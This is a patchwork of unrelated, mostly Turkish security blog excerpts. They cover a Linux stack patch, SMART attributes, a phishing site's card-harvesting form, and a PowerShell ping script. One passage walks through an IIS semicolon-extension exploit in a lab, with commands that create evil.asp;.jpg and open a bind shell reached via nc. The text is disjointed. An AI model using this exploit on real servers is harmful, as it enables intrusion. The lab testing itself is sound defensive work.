it is created one of the earlier security patches for the Linux kernel
that addressed the problems created by an executable user stack area. This feature
prevents attacks where a buffer overflow overwrites return pointers allowing an attacker
to execute arbitrary code inserted into the stack. “This patch also changes the default
address that shared libraries are mmap()’ed at to make it always contain a zero byte.
This makes it impossible to specify any more data (parameters to the function, or more
copies of the return address when filling with a pattern), — in many exploits that have to
do with ASCIIZ strings.”(7) While an excellent strategy in buffer overflow prevention,
this system only provides protection against these specific types of buffer overflows.
These features are also only available for Linux kernels running on i386 architectures.
Other (architecture independent) security enhancements provided by the x.

Disk S.M.A.R.T testleri esnasında dönen değerlerin disk içerisinde ne anlam ifade ettiğini güzelce açıklayan bir tablo.WD diskimi performans testlerine dahil ederken sıkça analiz ettiğim başlıklar.
Paylaşmak istedim.

Each SMART attribute indicates a certain characteristic of the drive and has its own value derived from a special normalization algorithm and formula. The attributes listed below are specific to WD drives. Other drive manufacturers may have their own attribute definition.

-rw-r–r–. 1 root root  55K Jun  9 03:20 install.txt
-rw-r–r–. 1 root root  13K Jun  9 03:22 install.txt.gz
-rw-r–r–. 1 root root  13K Jun  9 03:27 install.txt2.gz
-rw-r–r–. 1 root root  15K Jun  9 03:42 install.txt3.gz

exit status 0

Exit status:
0  if OK,
1  if minor problems (e.g., cannot access subdirectory),
2  if serious trouble (e.g., cannot access command-line argument).

l: listing format
a : all
h: print sizes in human readable format
t: sort by modification time
r: reverse order while sorting

İngiltereye gitmeden hemen önce, Genç Girişimciler Kulübünde “IT SEKTÖRÜNDE KİŞİSEL GELİŞİM VE KARİYER” isimli Ferruh Mavituna’nın konuşmacı olarak bulunduğu (tek konuşmacı oydu) bir akşam saati düzenlenen seminere gitmiştim.Kendisini keyifle dinlemiş, Netsparker‘a gelene kadar neler olduğunu ve diğer yaşamıyla alakalı konuları ele alarak ders çıkarılabilecek yanların üzerinde durmuştu.Fakat asıl sormak istediğim çok deep soruları kendisine ileteme gibi acıklı bir durum’da olmuştu .Seminer bitiminde kendisiyle kısa bir soyleyişimiz oldu ve bu söyleşi genel olarak, yakın bir zamanda İngiltere’de bulunacağımı ve oradayken kendisini de ziyaret etmek yönündeydi.Daha sonra uzak lokasyonlarda olduğumuzdan maalesef görüşememiştik.Bugün tesadüfen ilgili seminer sonrası çekilen bir kareyi gördüm.

Neler Okuyorum ?

Şu sıralar  İskender Pala’nın,  Şah&Sultan isimli tarihe ışık tutan her cümlesini keyifle sindirdiğim yeni eserini okuyorum.Hemen sonra,“Sockets, Shellcode, Porting, and Coding: Reverse Engineering Exploits and Tool Coding for Security Professionals” isimli kitabı okumayı düşünüyorum.

Ve ardından aşağıdaki şu 2 kitabı okuyacağım,

-Securing & Optimizing Linux: The Hacking Solution

Neler Yapıyorum?

Haftada 2 gün akşama doğru olimpik bir havuzda yüzüyor,cuma/cumartesi geceleri Vulnerability Assessment testler yapıyor,her gün vulnerability rss feedleri kontrol ediyor,researching yapıyor, bloğum için bir şeyler yazmaya çalışıyor ve hafta sonu çok sevdiğim biriyle bir kaç saat vakit geçiriyorum.Bunun yanında hazır e-book siteler keşfetmişken (Harun’a teşekkürler) yeni model bir Kindle almayı düşünüyorum.

Amazon üzerinden sipariş ettiğim RHCE Exam hazırlık kitabım.

-RHCE Red Hat Certified Engineer Linux Study Guide (Exam RH302) (Certification Press)

Yukarıdaki resimde göreceğiniz domain, bahsettiğimiz kötü amaca hizmet ediyordu.İlgili siteye giriş yapıldığında öncelikle kullanıcının güvenli bir platform üzerinde olduğu izlenimi veriliyor. Zira ziyaret edilen sitenin SSL sertifikasına sahip olduğu hatta online kontor alımı sırasında 3D gibi opsiyonel bir baska guvenli alisveris seceneginin de olduğu belirtilmiş.

SSL ve buna paralel olarak 3D mekanizmaları’nın etkin olmadığını ilgili sitenin kaynak kodlarına erişip inceleme fırsatı  buldugum da gördüm.Kullanıcılar dan edinilen özel bilgilerin, gmail smtp sunucusuna  ait bir e-posta adresine gönderiliyor.

OpenSSL ile ilgili domainin, www ve http kayitlarinin SSL uzerinden calisip calismadigini anlamak icin openssl’in klasik 2 komutunu kullandim. Sonuç: Parallels firmasina ait dijital sertifika bilgileri dönüyor.  :)

ugur@localroot:~/labuser$ openssl s_client -connect onlinetlyukleme.com:443
ugur@localroot:~/labuser$ openssl s_client -connect www.onlinetlyukleme.com:443

depth=0 /C=US/ST=Virginia/L=Herndon/O=Parallels, Inc./OU=Plesk/CN=plesk/emailAddress=info@parallels.com
verify error:num=18:self signed certificate
verify return:1
depth=0 /C=US/ST=Virginia/L=Herndon/O=Parallels, Inc./OU=Plesk/CN=plesk/emailAddress=info@parallels.com
verify return:1
—
Certificate chain
0 s:/C=US/ST=Virginia/L=Herndon/O=Parallels, Inc./OU=Plesk/CN=plesk/emailAddress=info@parallels.com
i:/C=US/ST=Virginia/L=Herndon/O=Parallels, Inc./OU=Plesk/CN=plesk/emailAddress=info@parallels.com
—
Server certificate

Kontor almak istediginiz de acilan sayfa http protokolu uzerinden çalışıyor  ve sizleri https protokolu uzerine yonlenmenizi tetikleyecek bir mekanizma da sağlanmamış.Bu sebeple  aradaki trafik clear text olarak  donuyor. Bunun yanın da, kredi kartı ve diğer önemli bilgilerin girildiği sayfayı manuel olarak https uzerinden cağırdığımız da  zaten ilgili domaine ait gecerli bir SSL sertifikasi’nin bulunmadigini goruyoruz.
Yani domain, kendine ait olan bir sertifika ile SSL protokolu uzerinden zaten çalışmıyor.

Bu olay, kontol ettigim bir sunucu’da gerçekleştiği için kaynak kodlarini inceleme firsatim oldu.Şimdi,kullanıcılardan kart bilgilerini alip yazili ifadelerle kontör gönderdiğini iddia eden platformun en kritik sayfasina ait kaynak kodlarina bakalım. (yukle.php)

<DIV id=page><IMG height=98 alt=”" src=”images/garanti_.jpg” width=543
vspace=15>
<DIV id=tablo>
<TABLE cellSpacing=0 cellPadding=5 width=520 border=0>
<FORM name=requestForm onsubmit=”return formKontrol(this);”action=gonder.php method=post>

Girilen tüm bilgiler, gonder.php isimli bir diğer sayfaya post ediliyor.

Hemen, gonder.php isimli sayfaninin kaynak kodlarini açalım ve bingo! lütfen tanimlanan değişkenlere dikkatle göz gezdiriniz.

Fakat tüm bu görülenler saldırı konseptinin amatörce hazırlanmış oldugunu ortaya koyuyor.Dikkat edilirse, web üzerinden email gonderen bir script inputlara girilen değerleri bir email adresine gonderiyor ,fakat ilgili sitenin host edildiği sunucu  güvenlik gerekceleri sebebiyle buna benzer public email gonderimlere kapalı öncelikle smtp protokolu doğrulama mekanizmasinin ilgili yazilimda set edilmesi gerekirdi.(Malesef birçok smtp sunucusu bu tur public gonderimlere açık) Bunun yanında herhangi bir algoritma tekniği ile kodlar encrypt de edilmemis.Muhtemelen bu script, paralı veya bir yerde public edilmis’ki. Bu denli ameleler’de  ( toplumda dolandırıcı ve/veya hırsız olarak tanimlanan kimselerce) temin edip kullanabiliyor.

Patch cozumu gelistirmek icin ilgili exploiti virtual bir Windows Server da test ettim.

Shellcode / Payload Connection

0 – shell_bind_tcp

Penetration materyaller:

OS : Server 2003 Enterprise x86 SP2
Victim Vlan: 192.168.127.130
Web Server : IIS6
Destination: Ubuntu 9.10 (karmic)

Testleri yapalım:

root@ubuntu:~/labs# python iis.py def.jpg 0
Exploit for Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x
By Emanuele Gentili and Emanuele Acri (http://backtrack.it)
[+] File evil.asp;.jpg created and ready to use.
Enjoy… ;)

root@ubuntu:~/labs# ls -l
total 1260
-rw-r–r– 1 root root  12902 2009-10-31 01:08 def.jpg
-rw-r–r– 1 root root 326377 2010-01-10 14:08 evil.asp;.jpg
-rwxrwxrwx 1 root root 945931 2010-01-10 14:03 iis.py

evil.asp;.jpg vulnerable durumda olan dosyayı IIS sunucuda çalıştıralım.

root@ubuntu:~/labs# nc -vv 192.168.127.130 31337
192.168.127.130: inverse host lookup failed: Unknown hosit
(UNKNOWN) [192.168.127.130] 31337 (?) open
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>ipconfig

Windows IP ConfigurationEthernet adapter Local Area Connection:
Connection-specific DNS Suffix  . : localdomain
IP Address. . . . . . . . . . . . : 192.168.127.130
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.127.2

c:\windows\system32\inetsrv>net user
User accounts for \\LOCALROOT

Network tarafinda olayları gozlemlemek icin, enfekte durumun da olup hacklenen serveri kontrol edelim.(Handshake checking)

Nmap ile kontrol edelim.

root@ubuntu:~/labs# nmap -sT -d 192.168.127.130 -p 31337

31337/tcp open  Elite        syn-ack
MAC Address: 00:0C:29:71:6D:2B (VMware

Referanslar:

http://soroush.secproject.com/downloadable/iis-semicolon-report.pdf

http://secunia.com/advisories/37831/

Kısaca Powershell Nedir?
Microsoft’un .Net Framework destekli gelistirdigi en kapsamlı shell konsoludur. Powershell uzerinde  .net tabanlı scripting calistirma imkanı bulabiliyorsunuz.

$readfile=get-content “C:\Users\root\Desktop\servers.txt“
foreach($readf in $readfile)
{
$ALive=get-wmiobject win32_pingstatus -Filter “Address=’$readf’” | Select-Object statuscode
if($ALive.statuscode -eq 0)
{write-host $readf is REACHABLE -background “GREEN” -foreground “BLACk”}
else
{
write-host $readf is NOT reachable -background “RED” -foreground “BLACk”}
}
Domain listesinin path’ini belirmeniz ve Powershell konsolu açıp yukaridaki kodlari calıştımanız gerekcektir.

Ping’e cevap veren domainler REACHABLE , pinge cevap vermeyen domainler ise NOT REACHABLE şeklinde konsola yansıyacaktır.

Detaylar:

http://www.microsoft.com/windowsserver2003/technologies/management/powershell/download.mspx

http://www.microsoft.com/windowsserver2003/technologies/management/powershell/default.mspx